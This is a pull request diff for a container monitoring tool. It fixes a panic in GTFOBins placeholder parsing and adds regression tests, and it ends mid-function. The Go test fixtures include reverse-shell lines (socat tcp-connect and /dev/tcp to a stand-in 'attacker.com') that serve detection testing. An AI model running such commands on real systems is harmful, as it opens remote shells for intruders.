### PR TITLE
fix(monitor): bounds-safe GTFOBins placeholder stripping (#505)

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -173,9 +173,9 @@ jobs:
           - name: git-hooks
             path: tests/git_hooks
             description: "Git hooks and security protection tests"
-          - name: monitoring-gtfobins-505
-            path: tests/integration/test_issue_505_resume_monitoring_panic.py
-            description: "Regression for #505: GTFOBins DB load panic under monitoring"
+          - name: monitoring-db
+            path: tests/integration/test_issue_505_resume_monitoring_panic.py tests/integration/test_gtfobins_db_pattern_detection.py tests/integration/test_gtfobins_db_absent_fallback.py tests/integration/test_sigma_db_detection.py
+            description: "Monitoring detection-DB load paths (GTFOBins + Sigma), present and absent, incl. #505 regression"
     steps:
       - uses: actions/checkout@df4cb1c069e1874edd31b4311f1884172cec0e10 # v6.0.3
 

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -52,8 +52,11 @@ jobs:
       - name: Build
         run: go build -v ./...
 
-      - name: Verify all test paths are assigned to a CI group
-        run: python3 scripts/check-ci-coverage.py
+      # DEBUG BRANCH (issue #505): coverage guard disabled because the
+      # integration matrix is temporarily trimmed to the single repro test.
+      # Revert this and the matrix below before merging.
+      # - name: Verify all test paths are assigned to a CI group
+      #   run: python3 scripts/check-ci-coverage.py
 
   # Go unit tests run in parallel with integration tests (after build passes)
   unit-tests:
@@ -112,67 +115,13 @@ jobs:
     strategy:
       fail-fast: false
       matrix:
+        # DEBUG BRANCH (issue #505): matrix trimmed to ONLY the resume+monitoring
+        # panic repro so CI is a fast focused debug loop. Restore the full matrix
+        # (see git history of this file on master) before merging.
         test_group:
-          - name: shell-ephemeral
-            path: tests/shell/ephemeral
-            description: "Ephemeral shell session tests"
-          - name: shell-persistent
-            path: tests/shell/persistent
-            description: "Persistent shell session tests"
-          - name: network
-            path: tests/network
-            description: "Network isolation tests"
-          - name: container-file
-            path: tests/container tests/file
-            description: "Container and file operations"
-          - name: core
-            path: tests/list tests/attach tests/tmux tests/kill tests/persist
-            description: "Core commands: list/attach/tmux/kill/persist"
-          - name: core-build
-            path: tests/build tests/run
-            description: "Build and run command tests"
-          - name: misc-cli
-            path: tests/cli
-            description: "CLI flag/format/output tests"
-          - name: misc-snapshot
-            path: tests/meta tests/snapshot tests/image
-            description: "Snapshot, image, and meta command tests"
-          - name: misc-commands
-            path: tests/clean tests/completion tests/docker tests/errors tests/help tests/info tests/mount tests/monitor tests/shutdown tests/update tests/version tests/main_help_flag.py tests/main_help_shorthand.py
-            description: "Misc commands: clean/completion/docker/errors/help/info/mount/monitor/shutdown/update/version + root help files"
-          - name: misc-config
-            path: tests/config tests/health tests/limits tests/schema
-            description: "Config, health, limits, and schema tests"
-          - name: monitoring-nft
-            path: tests/integration/test_nft_monitoring.py
-            description: "NFT network monitoring tests"
-          - name: monitoring-threats
-            path: tests/integration/test_security_monitoring.py
-            pytest_args: "-k 'TestThreatDetection or TestEnvironmentScanningPatterns or TestReverseShellPatterns or TestNetworkThreats or TestPromptInjectionScenario or TestMonitoringFeature'"
-            description: "Threat detection tests"
-          - name: monitoring-response
-            path: tests/integration/test_security_monitoring.py
-            pytest_args: "-k 'TestAutomatedResponse or TestHighLevelThreats or TestLargeWriteDetection or TestMonitoringConfiguration or TestMultipleThreats or TestAuditLogValidation or TestFalsePositives or TestThresholdBoundaries or TestConcurrentThreats'"
-            description: "Response and threshold tests"
-          - name: monitoring-advanced
-            path: tests/integration/test_security_monitoring.py
-            pytest_args: "-k 'TestExpandedEnvScanningPatterns or TestProcessHostProcWalk or TestForkBombDetection or TestProcessSpawnRateDetection or TestAuthLogWatcher or TestProcEventWatcher or TestCgroupInitPID'"
-            description: "Host-side monitoring: env scan, process walk, fork bomb, spawn rate, auth log, proc events, cgroup init PID"
-          - name: monitoring-network-detection
-            path: tests/integration/test_network_connection_detection.py
-            description: "Host-side /proc/<pid>/net TCP/UDP suspicious connection detection"
-          - name: monitoring-log-inotify
-            path: tests/integration/test_log_watcher_inotify.py
-            description: "inotify-driven auth.log/syslog monitoring: syslog coverage, prompt delivery, log rotation"
-          - name: monitoring-file-fanotify
-            path: tests/integration/test_file_watcher_fanotify.py
-            description: "fanotify sensitive file monitoring: shadow read, sudoers write, authorized_keys write"
-          - name: uid-mapping
-            path: tests/container/uid_mapping_shift_true.py tests/container/uid_mapping_raw_idmap.py
-            description: "UID mapping integration tests"
-          - name: git-hooks
-            path: tests/git_hooks
-            description: "Git hooks and security protection tests"
+          - name: issue-505-repro
+            path: tests/integration/test_issue_505_resume_monitoring_panic.py
+            description: "Repro for #505: resume + monitoring slice-bounds panic"
     steps:
       - uses: actions/checkout@df4cb1c069e1874edd31b4311f1884172cec0e10 # v6.0.3
 

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -52,11 +52,8 @@ jobs:
       - name: Build
         run: go build -v ./...
 
-      # DEBUG BRANCH (issue #505): coverage guard disabled because the
-      # integration matrix is temporarily trimmed to the single repro test.
-      # Revert this and the matrix below before merging.
-      # - name: Verify all test paths are assigned to a CI group
-      #   run: python3 scripts/check-ci-coverage.py
+      - name: Verify all test paths are assigned to a CI group
+        run: python3 scripts/check-ci-coverage.py
 
   # Go unit tests run in parallel with integration tests (after build passes)
   unit-tests:
@@ -115,13 +112,70 @@ jobs:
     strategy:
       fail-fast: false
       matrix:
-        # DEBUG BRANCH (issue #505): matrix trimmed to ONLY the resume+monitoring
-        # panic repro so CI is a fast focused debug loop. Restore the full matrix
-        # (see git history of this file on master) before merging.
         test_group:
-          - name: issue-505-repro
+          - name: shell-ephemeral
+            path: tests/shell/ephemeral
+            description: "Ephemeral shell session tests"
+          - name: shell-persistent
+            path: tests/shell/persistent
+            description: "Persistent shell session tests"
+          - name: network
+            path: tests/network
+            description: "Network isolation tests"
+          - name: container-file
+            path: tests/container tests/file
+            description: "Container and file operations"
+          - name: core
+            path: tests/list tests/attach tests/tmux tests/kill tests/persist
+            description: "Core commands: list/attach/tmux/kill/persist"
+          - name: core-build
+            path: tests/build tests/run
+            description: "Build and run command tests"
+          - name: misc-cli
+            path: tests/cli
+            description: "CLI flag/format/output tests"
+          - name: misc-snapshot
+            path: tests/meta tests/snapshot tests/image
+            description: "Snapshot, image, and meta command tests"
+          - name: misc-commands
+            path: tests/clean tests/completion tests/docker tests/errors tests/help tests/info tests/mount tests/monitor tests/shutdown tests/update tests/version tests/main_help_flag.py tests/main_help_shorthand.py
+            description: "Misc commands: clean/completion/docker/errors/help/info/mount/monitor/shutdown/update/version + root help files"
+          - name: misc-config
+            path: tests/config tests/health tests/limits tests/schema
+            description: "Config, health, limits, and schema tests"
+          - name: monitoring-nft
+            path: tests/integration/test_nft_monitoring.py
+            description: "NFT network monitoring tests"
+          - name: monitoring-threats
+            path: tests/integration/test_security_monitoring.py
+            pytest_args: "-k 'TestThreatDetection or TestEnvironmentScanningPatterns or TestReverseShellPatterns or TestNetworkThreats or TestPromptInjectionScenario or TestMonitoringFeature'"
+            description: "Threat detection tests"
+          - name: monitoring-response
+            path: tests/integration/test_security_monitoring.py
+            pytest_args: "-k 'TestAutomatedResponse or TestHighLevelThreats or TestLargeWriteDetection or TestMonitoringConfiguration or TestMultipleThreats or TestAuditLogValidation or TestFalsePositives or TestThresholdBoundaries or TestConcurrentThreats'"
+            description: "Response and threshold tests"
+          - name: monitoring-advanced
+            path: tests/integration/test_security_monitoring.py
+            pytest_args: "-k 'TestExpandedEnvScanningPatterns or TestProcessHostProcWalk or TestForkBombDetection or TestProcessSpawnRateDetection or TestAuthLogWatcher or TestProcEventWatcher or TestCgroupInitPID'"
+            description: "Host-side monitoring: env scan, process walk, fork bomb, spawn rate, auth log, proc events, cgroup init PID"
+          - name: monitoring-network-detection
+            path: tests/integration/test_network_connection_detection.py
+            description: "Host-side /proc/<pid>/net TCP/UDP suspicious connection detection"
+          - name: monitoring-log-inotify
+            path: tests/integration/test_log_watcher_inotify.py
+            description: "inotify-driven auth.log/syslog monitoring: syslog coverage, prompt delivery, log rotation"
+          - name: monitoring-file-fanotify
+            path: tests/integration/test_file_watcher_fanotify.py
+            description: "fanotify sensitive file monitoring: shadow read, sudoers write, authorized_keys write"
+          - name: uid-mapping
+            path: tests/container/uid_mapping_shift_true.py tests/container/uid_mapping_raw_idmap.py
+            description: "UID mapping integration tests"
+          - name: git-hooks
+            path: tests/git_hooks
+            description: "Git hooks and security protection tests"
+          - name: monitoring-gtfobins-505
             path: tests/integration/test_issue_505_resume_monitoring_panic.py
-            description: "Repro for #505: resume + monitoring slice-bounds panic"
+            description: "Regression for #505: GTFOBins DB load panic under monitoring"
     steps:
       - uses: actions/checkout@df4cb1c069e1874edd31b4311f1884172cec0e10 # v6.0.3
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,5 +1,11 @@
 # CHANGELOG
 
+## Unreleased
+
+### Fixed
+
+- **Monitoring no longer crashes at session start when the GTFOBins detection DB is present (#505)** — with `[monitoring] enabled = true` and a GTFOBins clone on disk (e.g. after `coi update-patterns`), the proc-event watcher loaded the exec-pattern DB at session start and panicked: `slice bounds out of range [:12] with length 11`. The whole `coi` process died in a goroutine right after "monitoring started" — for both `coi shell` and `coi shell --resume` (patterns load on every session start). Root cause: `gtfobinsStripPlaceholders` computed the lowercased string once but reassigned `token` inside its placeholder loop, so once an earlier placeholder shortened the token, a later placeholder's stale index (a position in the original, longer string) overran it. The standard GTFOBins `socat` entry triggered it deterministically via the token `tcp-connect:attacker.com:12345`: matching `attacker.com` (index 12) shortened the token to `tcp-connect` (length 11), then matching `attacker` (a substring, still at index 12) did `token[:12]`. The parser now indexes and slices the same (lowercased) string, so the index can never exceed the token length. CI did not catch this because it has no GTFOBins clone (the loader falls back to compiled-in defaults when the DB is absent).
+
 ## 0.9.0 (2026-06-17)
 
 ### Security

--- a/internal/monitor/db_loadpaths_test.go
+++ b/internal/monitor/db_loadpaths_test.go
@@ -1,0 +1,199 @@
+package monitor
+
+import (
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+)
+
+// These tests exercise the detection-DB load paths (GTFOBins + Sigma) and their
+// usage (matching), for both the "DB present" and "DB absent" cases — the path
+// that crashed in issue #505 and that CI integration tests do not cover (CI has
+// no clone). They are hermetic: no Incus, no network.
+
+// --- GTFOBins -------------------------------------------------------------
+
+// Representative GTFOBins entries, including the exact token that triggered #505
+// (socat "tcp-connect:attacker.com:12345") and a distinctive-keyword entry used
+// to assert matching works end to end.
+var gtfobinsFixtures = map[string]string{
+	"socat": `functions:
+  reverse-shell:
+  - code: |-
+      socat tcp-connect:attacker.com:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane
+`,
+	"frobnicator": `functions:
+  reverse-shell:
+  - code: |-
+      frobnicator --frobsocket attacker.com 4444
+`,
+	// Edge shapes that stress the placeholder stripper.
+	"edgey": `functions:
+  reverse-shell:
+  - code: |-
+      edgey /dev/tcp/attacker.com/12345 /path/to/x 0<&196
+`,
+}
+
+func writeGTFObinsClone(t *testing.T) string {
+	t.Helper()
+	dir := t.TempDir()
+	binDir := filepath.Join(dir, "_gtfobins")
+	if err := os.MkdirAll(binDir, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	for name, body := range gtfobinsFixtures {
+		if err := os.WriteFile(filepath.Join(binDir, name), []byte(body), 0o644); err != nil {
+			t.Fatal(err)
+		}
+	}
+	return dir
+}
+
+// DB present: loading parses every entry without panic, derives keywords, and the
+// derived pattern actually matches a process command (the execution/usage path).
+func TestExecPatterns_DBPresent_LoadParseMatch(t *testing.T) {
+	pats := loadExecPatterns(writeGTFObinsClone(t)) // must not panic (#505)
+	if len(pats) == 0 {
+		t.Fatal("expected exec patterns from a populated GTFOBins clone")
+	}
+
+	// The frobnicator entry's only distinctive keyword is "--frobsocket"
+	// (placeholders + numeric port are stripped). A matching command must hit it.
+	if name := matchSuspiciousExec("frobnicator --frobsocket 1.2.3.4 4444", pats); name == "" {
+		t.Error("DB-derived frobnicator pattern did not match a matching command")
+	}
+	// A benign command must not match.
+	if name := matchSuspiciousExec("ls -la /tmp", pats); name != "" {
+		t.Errorf("benign command unexpectedly matched %q", name)
+	}
+}
+
+// DB absent: loader falls back to the compiled-in defaults (non-empty) and does
+// not panic, so detection still works without a clone.
+func TestExecPatterns_DBAbsent_FallsBackToDefaults(t *testing.T) {
+	withDefaults := loadExecPatterns(filepath.Join(t.TempDir(), "nonexistent"))
+	if len(withDefaults) == 0 {
+		t.Fatal("expected compiled-in default exec patterns when no clone is present")
+	}
+	// An empty (existing) clone dir is also fine.
+	empty := t.TempDir()
+	_ = os.MkdirAll(filepath.Join(empty, "_gtfobins"), 0o755)
+	if got := loadExecPatterns(empty); len(got) == 0 {
+		t.Fatal("expected default patterns for an empty clone dir")
+	}
+}
+
+// --- Sigma ----------------------------------------------------------------
+
+// A loadable linux/process_creation rule (level high) with a distinctive
+// CommandLine token, plus shapes that exercise the condition/selection parsers.
+const sigmaCanaryRule = `title: COI Test Canary
+id: 00000000-0000-0000-0000-000000000001
+logsource:
+    category: process_creation
+    product: linux
+detection:
+    selection:
+        CommandLine|contains: 'coi-sigma-canary-zzz'
+    condition: selection
+level: high
+`
+
+const sigmaAndNotRule = `title: COI Test And-Not
+id: 00000000-0000-0000-0000-000000000002
+logsource:
+    category: process_creation
+    product: linux
+detection:
+    selection:
+        CommandLine|contains: 'needle-aaa'
+    filter:
+        CommandLine|contains: 'allowed-bbb'
+    condition: selection and not filter
+level: critical
+`
+
+func writeSigmaClone(t *testing.T) string {
+	t.Helper()
+	dir := t.TempDir()
+	rulesDir := filepath.Join(dir, "rules", "linux", "process_creation")
+	if err := os.MkdirAll(rulesDir, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	for name, body := range map[string]string{
+		"canary.yml": sigmaCanaryRule,
+		"andnot.yml": sigmaAndNotRule,
+	} {
+		if err := os.WriteFile(filepath.Join(rulesDir, name), []byte(body), 0o644); err != nil {
+			t.Fatal(err)
+		}
+	}
+	return dir
+}
+
+// DB present: rules load without panic and the compiled rule matches a process.
+func TestSigmaPatterns_DBPresent_LoadParseMatch(t *testing.T) {
+	pats := loadSigmaPatterns(writeSigmaClone(t)) // must not panic
+	if len(pats) == 0 {
+		t.Fatal("expected sigma patterns from a populated clone")
+	}
+
+	matchedCanary := false
+	for _, p := range pats {
+		if matchSigmaPattern("/usr/bin/x", "evil coi-sigma-canary-zzz now", "/usr/bin/bash", "bash", p) {
+			matchedCanary = true
+		}
+	}
+	if !matchedCanary {
+		t.Error("sigma canary rule did not match a matching command line")
+	}
+
+	// "selection and not filter": matches needle alone, excluded when filter present.
+	var andNot *sigmaPattern
+	for i := range pats {
+		if strings.Contains(pats[i].Title, "And-Not") {
+			andNot = &pats[i]
+		}
+	}
+	if andNot == nil {
+		t.Fatal("expected the and-not rule to load")
+	}
+	if !matchSigmaPattern("/x", "run needle-aaa", "/bin/bash", "bash", *andNot) {
+		t.Error("and-not rule should match needle without the filter token")
+	}
+	if matchSigmaPattern("/x", "run needle-aaa allowed-bbb", "/bin/bash", "bash", *andNot) {
+		t.Error("and-not rule should be excluded when the filter token is present")
+	}
+}
+
+// DB absent: no rules, no panic (Sigma is purely additive).
+func TestSigmaPatterns_DBAbsent_NoneNoPanic(t *testing.T) {
+	if got := loadSigmaPatterns(filepath.Join(t.TempDir(), "nonexistent")); len(got) != 0 {
+		t.Errorf("expected no sigma patterns without a clone, got %d", len(got))
+	}
+}
+
+// --- #505-class guard: parser must never panic on hostile token input -------
+
+func TestGTFObinsStripPlaceholders_NeverPanics(t *testing.T) {
+	hostile := []string{
+		"tcp-connect:attacker.com:12345", // the exact #505 trigger
+		"", "attacker", "attacker.com", "/path/to", ":::attacker.com:::",
+		"İİİattacker", "ẞ/path/to/attacker.com", "🔥/path/to/🔥",
+		"a:attacker.com:attacker:/path/to:b",
+		strings.Repeat("/attacker.com", 2000),
+		strings.Repeat("İ", 50) + "attacker",
+	}
+	for _, tok := range hostile {
+		func() {
+			defer func() {
+				if r := recover(); r != nil {
+					t.Errorf("gtfobinsStripPlaceholders(%q) panicked: %v", tok, r)
+				}
+			}()
+			_ = gtfobinsStripPlaceholders(tok)
+		}()
+	}
+}

--- a/internal/monitor/gtfobins.go
+++ b/internal/monitor/gtfobins.go
@@ -140,12 +140,24 @@ func deriveKeywords(binaryName string, funcs []gtfoBinFunc) []string {
 //	"/dev/tcp/attacker.com/12345" → "/dev/tcp/"
 //	"attacker.com"                → ""
 func gtfobinsStripPlaceholders(token string) string {
-	lower := strings.ToLower(token)
+	// Operate on the lowercased form throughout. strings.Index below runs against
+	// it and the caller lowercases the result anyway, so indexing and slicing
+	// share one string. This avoids a bounds panic (issue #505): the previous
+	// code computed `lower` once but reassigned `token` inside the loop, so once
+	// an earlier placeholder shortened `token`, a later placeholder's index — a
+	// position in the original, longer string — could overrun the shortened
+	// token. E.g. "tcp-connect:attacker.com:12345": "attacker.com" (idx 12)
+	// shortened token to "tcp-connect" (len 11), then "attacker" (also idx 12 in
+	// the stale string) did token[:12] -> "slice bounds out of range [:12] with
+	// length 11". Slicing the same string we index into makes idx <= len always.
+	token = strings.ToLower(token)
 	for _, ph := range []string{"attacker.com", "attacker", "/path/to"} {
-		if idx := strings.Index(lower, ph); idx > 0 {
-			token = strings.TrimRight(token[:idx], ":.")
-		} else if idx == 0 {
+		idx := strings.Index(token, ph)
+		if idx == 0 {
 			return ""
+		}
+		if idx > 0 {
+			token = strings.TrimRight(token[:idx], ":.")
 		}
 	}
 	// Strip pure-numeric path segments (e.g. port numbers), working from the

--- a/internal/monitor/procwatcher_test.go
+++ b/internal/monitor/procwatcher_test.go
@@ -258,6 +258,13 @@ func TestGTFOBinsStripPlaceholders(t *testing.T) {
 		{"fsockopen", "fsockopen"},
 		// Numeric suffix without slash is stripped correctly.
 		{"socat/12345", "socat"},
+		// Regression (issue #505): a token where one placeholder is a substring
+		// of an earlier one ("attacker" inside "attacker.com") and the first
+		// match shortens the token below the second match's index. Must yield the
+		// structural prefix, not panic with "slice bounds out of range [:12]".
+		{"tcp-connect:attacker.com:12345", "tcp-connect"},
+		{"TCP-CONNECT:ATTACKER.COM:12345", "tcp-connect"},
+		{"udp:attacker:9999", "udp"},
 	}
 	for _, tc := range cases {
 		got := gtfobinsStripPlaceholders(tc.in)

--- a/tests/integration/test_gtfobins_db_absent_fallback.py
+++ b/tests/integration/test_gtfobins_db_absent_fallback.py
@@ -61,11 +61,13 @@ mode = "open"
 
 [monitoring]
 enabled = true
-auto_pause_on_high = true
-auto_kill_on_critical = true
+auto_pause_on_high = false
+auto_kill_on_critical = false
 poll_interval_sec = 1
 file_read_threshold_mb = 500
 file_read_rate_mb_per_sec = 1000
+process_count_threshold = 9999
+process_spawn_rate_threshold = 9999
 """
     )
 
@@ -92,8 +94,15 @@ file_read_rate_mb_per_sec = 1000
 
     if not ready:
         proc.terminate()
-        proc.wait(timeout=5)
+        try:
+            proc.wait(timeout=15)
+        except subprocess.TimeoutExpired:
+            proc.kill()
         pytest.skip(f"Container {container_name} did not reach Running state")
+
+    # PROC_EVENT_EXEC fires once at execve, so the proc-connector subscription
+    # must be established before we exec — otherwise the event is missed.
+    time.sleep(3)
 
     # Matches compiled-in nc-exec pattern: Arg0="nc", Keywords=["-e"].
     subprocess.Popen(
@@ -112,7 +121,7 @@ file_read_rate_mb_per_sec = 1000
 
     log_path = coi_dir / "audit" / f"{container_name}.jsonl"
     detected = False
-    for _ in range(20):
+    for _ in range(30):
         time.sleep(1)
         if log_path.exists():
             for raw in log_path.read_text().splitlines():
@@ -131,7 +140,10 @@ file_read_rate_mb_per_sec = 1000
             break
 
     proc.terminate()
-    proc.wait(timeout=5)
+    try:
+        proc.wait(timeout=15)
+    except subprocess.TimeoutExpired:
+        proc.kill()
     _cleanup(container_name, coi_binary)
 
     assert detected, (

--- a/tests/integration/test_gtfobins_db_pattern_detection.py
+++ b/tests/integration/test_gtfobins_db_pattern_detection.py
@@ -84,11 +84,13 @@ mode = "open"
 
 [monitoring]
 enabled = true
-auto_pause_on_high = true
-auto_kill_on_critical = true
+auto_pause_on_high = false
+auto_kill_on_critical = false
 poll_interval_sec = 1
 file_read_threshold_mb = 500
 file_read_rate_mb_per_sec = 1000
+process_count_threshold = 9999
+process_spawn_rate_threshold = 9999
 """
     )
 
@@ -115,8 +117,15 @@ file_read_rate_mb_per_sec = 1000
 
     if not ready:
         proc.terminate()
-        proc.wait(timeout=5)
+        try:
+            proc.wait(timeout=15)
+        except subprocess.TimeoutExpired:
+            proc.kill()
         pytest.skip(f"Container {container_name} did not reach Running state")
+
+    # PROC_EVENT_EXEC fires once at execve, so the proc-connector subscription
+    # must be established before we exec — otherwise the event is missed.
+    time.sleep(3)
 
     # argv[0] = "frobnicator --frobsocket" satisfies:
     #   - Arg0 prefix check  : "frobnicator --frobsocket".split()[0] → "frobnicator"
@@ -137,7 +146,7 @@ file_read_rate_mb_per_sec = 1000
 
     log_path = coi_dir / "audit" / f"{container_name}.jsonl"
     detected = False
-    for _ in range(20):
+    for _ in range(30):
         time.sleep(1)
         if log_path.exists():
             for raw in log_path.read_text().splitlines():
@@ -157,7 +166,10 @@ file_read_rate_mb_per_sec = 1000
             break
 
     proc.terminate()
-    proc.wait(timeout=5)
+    try:
+        proc.wait(timeout=15)
+    except subprocess.TimeoutExpired:
+        proc.kill()
     _cleanup(container_name, coi_binary)
 
     assert detected, (

--- a/tests/integration/test_issue_505_resume_monitoring_panic.py
+++ b/tests/integration/test_issue_505_resume_monitoring_panic.py
@@ -1,0 +1,188 @@
+"""
+Repro for issue #505: panic "slice bounds out of range [:12] with length 11"
+on `coi shell --resume` when [monitoring] enabled = true.
+
+Reported flow (0.9.0): a session created/resumed with monitoring enabled crashes
+the coi binary at session start with a Go slice-bounds panic, right after
+"Starting session..." / "[security] Process/filesystem monitoring started".
+With monitoring disabled it works.
+
+This test reproduces the real end-to-end scenario: it enables monitoring in
+trusted-scope config (~/.coi/config.toml), creates an ephemeral dummy session,
+powers it off (saving the session), then `coi shell --resume`. It asserts the
+coi process does NOT panic (no "slice bounds out of range" / "panic:" in output)
+and that the session actually resumes.
+
+NOTE (placeholder): the exact trigger is being pinned down; assertions target the
+panic signature from the issue so this test goes red on the bug and green on the
+fix. Refine the trigger/assertions once the root cause is confirmed.
+"""
+
+import os
+import subprocess
+import time
+from pathlib import Path
+
+from pexpect import EOF, TIMEOUT
+
+from support.helpers import (
+    calculate_container_name,
+    get_container_list,
+    send_prompt,
+    spawn_coi,
+    wait_for_container_ready,
+    wait_for_prompt,
+    wait_for_specific_container_deletion,
+    wait_for_text_in_monitor,
+    wait_for_text_on_screen,
+    with_live_screen,
+)
+
+PANIC_MARKERS = ("slice bounds out of range", "panic:", "runtime error:")
+
+
+def _write_monitoring_config():
+    """Enable monitoring in trusted-scope config, mirroring the issue's settings.
+
+    Returns (config_path, restore_fn). [network] mode=open avoids CI false-positive
+    network threats; high file-read thresholds avoid startup-noise HIGH threats.
+    """
+    config_path = Path.home() / ".coi" / "config.toml"
+    backup = config_path.read_text() if config_path.exists() else None
+    config_path.parent.mkdir(parents=True, exist_ok=True)
+    config_path.write_text(
+        """
+[network]
+mode = "open"
+
+[monitoring]
+enabled = true
+auto_pause_on_high = true
+auto_kill_on_critical = true
+poll_interval_sec = 1
+file_read_threshold_mb = 500
+file_read_rate_mb_per_sec = 1000
+
+[monitoring.nft]
+enabled = false
+"""
+    )
+
+    def restore():
+        if backup is not None:
+            config_path.write_text(backup)
+        elif config_path.exists():
+            config_path.unlink()
+
+    return config_path, restore
+
+
+def _raw_output(child):
+    if hasattr(child.logfile_read, "get_raw_output"):
+        return child.logfile_read.get_raw_output()
+    if hasattr(child.logfile_read, "get_display_stripped"):
+        return child.logfile_read.get_display_stripped()
+    if hasattr(child.logfile_read, "get_output"):
+        return child.logfile_read.get_output()
+    return ""
+
+
+def _assert_no_panic(output, where):
+    lowered = output.lower()
+    for marker in PANIC_MARKERS:
+        assert marker not in lowered, (
+            f"coi panicked during {where} (issue #505).\n"
+            f"Found marker {marker!r} in output:\n{output}"
+        )
+
+
+def test_resume_with_monitoring_does_not_panic(coi_binary, cleanup_containers, workspace_dir):
+    env = {"COI_USE_DUMMY": "1"}
+    config_path, restore = _write_monitoring_config()
+
+    try:
+        # === Phase 1: create an ephemeral session with monitoring enabled ===
+        child = spawn_coi(coi_binary, ["shell"], cwd=workspace_dir, env=env, timeout=120)
+        wait_for_container_ready(child, timeout=90)
+        wait_for_prompt(child, timeout=120)
+
+        container_name = calculate_container_name(workspace_dir, 1)
+
+        with with_live_screen(child) as monitor:
+            time.sleep(2)
+            send_prompt(child, "remember this message")
+            assert wait_for_text_in_monitor(monitor, "remember this message-BACK", timeout=30), (
+                "Dummy CLI should respond in the initial session"
+            )
+
+        # Exit CLI to bash, then poweroff to save the session.
+        child.send("exit")
+        time.sleep(0.3)
+        child.send("\x0d")
+        time.sleep(3)
+        child.send("sudo poweroff")
+        time.sleep(0.3)
+        child.send("\x0d")
+        try:
+            child.expect(EOF, timeout=60)
+        except TIMEOUT:
+            pass
+
+        output1 = _raw_output(child)
+        try:
+            child.close(force=False)
+        except Exception:
+            child.close(force=True)
+
+        _assert_no_panic(output1, "initial session with monitoring")
+        assert wait_for_specific_container_deletion(container_name, timeout=60), (
+            f"Container {container_name} should be deleted after poweroff"
+        )
+
+        # === Phase 2: resume — this is where #505 panics ===
+        child2 = spawn_coi(coi_binary, ["shell", "--resume"], cwd=workspace_dir, env=env, timeout=120)
+
+        resumed = False
+        try:
+            wait_for_container_ready(child2, timeout=90)
+            wait_for_text_on_screen(child2, "Resuming session", timeout=30)
+            resumed = True
+        except (TimeoutError, TIMEOUT, EOF):
+            resumed = False
+
+        output2 = _raw_output(child2)
+
+        # Best-effort cleanup before assertions.
+        try:
+            child2.send("exit")
+            time.sleep(0.3)
+            child2.send("\x0d")
+            time.sleep(2)
+            child2.send("sudo poweroff")
+            time.sleep(0.3)
+            child2.send("\x0d")
+            child2.expect(EOF, timeout=60)
+        except (TIMEOUT, EOF, Exception):
+            pass
+        try:
+            child2.close(force=False)
+        except Exception:
+            child2.close(force=True)
+
+        container_name2 = calculate_container_name(workspace_dir, 1)
+        if not wait_for_specific_container_deletion(container_name2, timeout=60):
+            subprocess.run(
+                [coi_binary, "container", "delete", container_name2, "--force"],
+                capture_output=True,
+                timeout=30,
+            )
+        time.sleep(1)
+        assert container_name2 not in get_container_list(), (
+            f"Container {container_name2} should be cleaned up"
+        )
+
+        # The actual repro assertions.
+        _assert_no_panic(output2, "coi shell --resume with monitoring")
+        assert resumed, f"Resume should succeed without crashing. Output:\n{output2}"
+    finally:
+        restore()

--- a/tests/integration/test_issue_505_resume_monitoring_panic.py
+++ b/tests/integration/test_issue_505_resume_monitoring_panic.py
@@ -16,16 +16,18 @@ it depends on the user's setup, not the dummy alone.
 This test plants a minimal GTFOBins DB containing the triggering token, points
 `[detection] gtfobins_dir` at it, enables monitoring, and starts a session — the
 same code path runs for both a fresh `coi shell` and `coi shell --resume`
-(patterns load at every session start). It asserts the coi process does not panic.
+(patterns load at every session start). coi's stderr is captured to a file (the
+panic + goroutine trace land there); the test asserts monitoring engaged and that
+no slice-bounds panic occurred.
 """
 
+import json
+import os
+import subprocess
 import time
 from pathlib import Path
 
-from support.helpers import (
-    spawn_coi,
-    wait_for_container_ready,
-)
+from support.helpers import calculate_container_name
 
 PANIC_MARKERS = ("slice bounds out of range", "panic:", "runtime error:")
 
@@ -51,12 +53,7 @@ def _write_trigger_gtfobins(base):
 
 def _write_monitoring_config(gtfobins_dir):
     """Enable monitoring in trusted-scope config and point detection at the
-    planted GTFOBins DB. Returns a restore() callable.
-
-    [network] mode=open avoids CI false-positive network threats; high file-read
-    thresholds avoid startup-noise HIGH threats; sigma_dir is set to a
-    non-existent path so only the GTFOBins trigger is exercised.
-    """
+    planted GTFOBins DB. Returns a restore() callable."""
     config_path = Path.home() / ".coi" / "config.toml"
     backup = config_path.read_text() if config_path.exists() else None
     config_path.parent.mkdir(parents=True, exist_ok=True)
@@ -91,69 +88,82 @@ sigma_dir = "{gtfobins_dir}/does-not-exist"
     return restore
 
 
-def _raw_output(child):
-    if hasattr(child.logfile_read, "get_raw_output"):
-        return child.logfile_read.get_raw_output()
-    if hasattr(child.logfile_read, "get_display_stripped"):
-        return child.logfile_read.get_display_stripped()
-    if hasattr(child.logfile_read, "get_output"):
-        return child.logfile_read.get_output()
-    return ""
+def _container_state(name):
+    r = subprocess.run(
+        ["incus", "list", name, "--format=json"], capture_output=True, text=True, timeout=20
+    )
+    if r.returncode != 0 or not r.stdout.strip():
+        return "Unknown"
+    try:
+        items = json.loads(r.stdout)
+    except json.JSONDecodeError:
+        return "Unknown"
+    return items[0].get("status", "Unknown") if items else "Unknown"
 
 
 def test_monitoring_gtfobins_load_does_not_panic(
     coi_binary, cleanup_containers, workspace_dir, tmp_path
 ):
-    """Starting a session with monitoring + a GTFOBins DB must not panic (#505).
-
-    The proc-event watcher loads the DB at session start; the buggy parser
-    crashed the whole coi process in a goroutine. We start a session and watch
-    for the panic signature, which (when present) appears right after
-    "monitoring started".
-    """
-    env = {"COI_USE_DUMMY": "1"}
+    """Starting a session with monitoring + a GTFOBins DB must not panic (#505)."""
     gtfobins_dir = _write_trigger_gtfobins(tmp_path)
     restore = _write_monitoring_config(gtfobins_dir)
+    container_name = calculate_container_name(workspace_dir, 1)
+    stderr_file = tmp_path / "coi-stderr.log"
+    env = {**os.environ, "COI_USE_DUMMY": "1"}
 
-    child = None
+    proc = None
+    fd = open(stderr_file, "w")  # noqa: SIM115 - kept open for the subprocess
     try:
